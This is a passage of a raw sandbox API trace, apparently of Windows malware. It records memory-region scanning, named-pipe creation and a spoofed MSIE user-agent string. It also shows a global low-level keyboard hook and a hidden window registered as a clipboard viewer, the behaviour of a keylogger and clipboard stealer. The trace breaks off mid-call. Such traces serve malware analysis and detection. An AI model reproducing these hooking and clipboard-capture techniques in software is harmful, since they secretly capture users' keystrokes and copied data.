NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961570000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961570000, AllocationBase=0x7ff961570000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.283] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971910000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971910000, AllocationBase=0x7ff971910000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961560000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961560000, AllocationBase=0x7ff961560000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9614d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9614d0000, AllocationBase=0x7ff9614d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961280000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961280000, AllocationBase=0x7ff961280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9687b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9687b0000, AllocationBase=0x7ff9687b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968780000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968780000, AllocationBase=0x7ff968780000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9610c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9610c0000, AllocationBase=0x7ff9610c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c6d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c6d0000, AllocationBase=0x7ff96c6d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.284] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.284] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c690000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c690000, AllocationBase=0x7ff96c690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c700000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c700000, AllocationBase=0x7ff96c700000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f5d0000, AllocationBase=0x7ff96f5d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f5b0000, AllocationBase=0x7ff96f5b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d320000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96d320000, AllocationBase=0x7ff96d320000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c670000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c670000, AllocationBase=0x7ff96c670000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c630000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c630000, AllocationBase=0x7ff96c630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972800000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972800000, AllocationBase=0x7ff972800000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c5f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c5f0000, AllocationBase=0x7ff96c5f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.285] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c020000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c020000, AllocationBase=0x7ff96c020000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.285] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96bfc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96bfc0000, AllocationBase=0x7ff96bfc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff960c20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff960c20000, AllocationBase=0x7ff960c20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973180000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973180000, AllocationBase=0x7ff973180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972450000, AllocationBase=0x7ff972450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9723b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9723b0000, AllocationBase=0x7ff9723b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972370000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972370000, AllocationBase=0x7ff972370000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cde0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cde0000, AllocationBase=0x7ff96cde0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.286] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965900000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965900000, AllocationBase=0x7ff965900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.286] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.287] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965950000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965950000, AllocationBase=0x7ff965950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.287] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.287] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972350000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972350000, AllocationBase=0x7ff972350000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.287] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.287] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f280000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f280000, AllocationBase=0x7ff96f280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.287] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.287] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972240000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972240000, AllocationBase=0x7ff972240000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.287] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.287] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977820000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977820000, AllocationBase=0x7ff977820000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.287] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.292] CreateNamedPipeA (lpName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" (normalized: "pipe\\{072bb6f5-baec-d114-fc2b-8e95f08fa299}"), dwOpenMode=0x40000003, dwPipeMode=0x4, nMaxInstances=0xff, nOutBufferSize=0x100, nInBufferSize=0x100, nDefaultTimeOut=0x0, lpSecurityAttributes=0x74f77b0) returned 0x1320 [0209.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74a8930, lpParameter=0x1320, dwCreationFlags=0x0, lpThreadId=0x235f648 | out: lpThreadId=0x235f648*=0xb2c) returned 0x130c [0209.292] wsprintfA (in: param_1=0x7aaff30, param_2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" | out: param_1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)") returned 63 [0209.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7497ea4, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x235f6d8 | out: lpThreadId=0x235f6d8*=0xb24) returned 0x1884 Thread: id = 99 os_tid = 0xb3c [0209.147] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 0x0 [0209.148] CreateEventA (lpEventAttributes=0x74f77b0, bManualReset=1, bInitialState=0, lpName="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 0x1334 [0209.148] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5b0f7c0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 100 os_tid = 0xb50 [0209.148] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="SetWindowsHookExA") returned 0x7ff9757b27a0 [0209.148] SetWindowsHookExA (idHook=13, lpfn=0x74c045c, hmod=0x7ff62aec0000, dwThreadId=0x0) returned 0x60125 [0209.149] GetTickCount () returned 0x1b0fb [0209.149] wsprintfA (in: param_1=0x74f78a0, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{D2E83952-8889-7854-A6A3-3A87C8CD7C51}") returned 38 [0209.149] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="RegisterClassA") returned 0x7ff9757d1310 [0209.149] RegisterClassA (lpWndClass=0x764f8f0) returned 0xc145 [0209.150] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="CreateWindowExA") returned 0x7ff9757d4df0 [0209.150] CreateWindowExA (dwExStyle=0x0, lpClassName="{D2E83952-8889-7854-A6A3-3A87C8CD7C51}", lpWindowName=0x0, dwStyle=0x0, X=1, Y=1, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff62aec0000, lpParam=0x74f7880) returned 0x501c0 [0209.151] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="GetWindowLongPtrA") returned 0x7ff9757bcae0 [0209.151] GetWindowLongPtrA (hWnd=0x501c0, nIndex=-21) returned 0x0 [0209.151] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="DefWindowProcA") returned 0x7ff977fc3230 [0209.151] NtdllDefWindowProc_A (hWnd=0x501c0, Msg=0x24, wParam=0x0, lParam=0x764f290) returned 0x0 [0209.151] GetWindowLongPtrA (hWnd=0x501c0, nIndex=-21) returned 0x0 [0209.151] NtdllDefWindowProc_A (hWnd=0x501c0, Msg=0x81, wParam=0x0, lParam=0x764f230) returned 0x1 [0209.153] GetWindowLongPtrA (hWnd=0x501c0, nIndex=-21) returned 0x0 [0209.153] NtdllDefWindowProc_A (hWnd=0x501c0, Msg=0x83, wParam=0x0, lParam=0x764f2b0) returned 0x0 [0209.154] GetWindowLongPtrA (hWnd=0x501c0, nIndex=-21) returned 0x0 [0209.155] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="SetWindowLongPtrA") returned 0x7ff9757c61f0 [0209.155] SetWindowLongPtrA (hWnd=0x501c0, nIndex=-21, dwNewLong=0x74f7880) returned 0x0 [0209.156] SetEvent (hEvent=0x1318) returned 1 [0209.156] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="GetMessageA") returned 0x7ff9757caa50 [0209.156] GetMessageA (in: lpMsg=0x764f8c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x764f8c0) returned 1 [0209.157] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="TranslateMessage") returned 0x7ff9757c36a0 [0209.157] TranslateMessage (lpMsg=0x764f8c0) returned 0 [0209.157] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="DispatchMessageA") returned 0x7ff9757d61e0 [0209.158] DispatchMessageA (lpMsg=0x764f8c0) returned 0x0 [0209.158] GetWindowLongPtrA (hWnd=0x501c0, nIndex=-21) returned 0x74f7880 [0209.158] NtdllDefWindowProc_A (hWnd=0x501c0, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0209.158] GetMessageA (lpMsg=0x764f8c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 101 os_tid = 0xb64 [0209.158] GetTickCount () returned 0x1b10b [0209.158] wsprintfA (in: param_1=0x74f7720, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{24B7E16E-39F5-82D0-82EF-D69304F9783D}") returned 38 [0209.158] RegisterClassA (lpWndClass=0x7b3fb50) returned 0xc146 [0209.158] CreateWindowExA (dwExStyle=0x0, lpClassName="{24B7E16E-39F5-82D0-82EF-D69304F9783D}", lpWindowName=0x0, dwStyle=0x0, X=1, Y=1, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff62aec0000, lpParam=0x74f7710) returned 0x4002a [0209.159] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x0 [0209.159] NtdllDefWindowProc_A (hWnd=0x4002a, Msg=0x24, wParam=0x0, lParam=0x7b3f4f0) returned 0x0 [0209.159] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x0 [0209.159] NtdllDefWindowProc_A (hWnd=0x4002a, Msg=0x81, wParam=0x0, lParam=0x7b3f490) returned 0x1 [0209.160] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x0 [0209.160] NtdllDefWindowProc_A (hWnd=0x4002a, Msg=0x83, wParam=0x0, lParam=0x7b3f510) returned 0x0 [0209.161] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x0 [0209.161] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="SetClipboardViewer") returned 0x7ff9757e0de0 [0209.161] SetClipboardViewer (hWndNewViewer=0x4002a) returned 0x0 [0209.162] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x0 [0209.162] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="PostMessageA") returned 0x7ff9757d4900 [0209.162] PostMessageA (hWnd=0x4002a, Msg=0x8001, wParam=0x0, lParam=0x0) returned 1 [0209.162] SetWindowLongPtrA (hWnd=0x4002a, nIndex=-21, dwNewLong=0x74f7710) returned 0x0 [0209.163] GetMessageA (in: lpMsg=0x7b3fb20, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7b3fb20) returned 1 [0209.163] TranslateMessage (lpMsg=0x7b3fb20) returned 0 [0209.163] DispatchMessageA (lpMsg=0x7b3fb20) returned 0x0 [0209.163] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x74f7710 [0209.163] NtdllDefWindowProc_A (hWnd=0x4002a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0209.163] GetMessageA (in: lpMsg=0x7b3fb20, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x7b3fb20) returned 1 [0209.163] TranslateMessage (lpMsg=0x7b3fb20) returned 0 [0209.163] DispatchMessageA (lpMsg=0x7b3fb20) returned 0x0 [0209.163] GetWindowLongPtrA (hWnd=0x4002a, nIndex=-21) returned 0x74f7710 [0209.163] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="OpenClipboard") returned 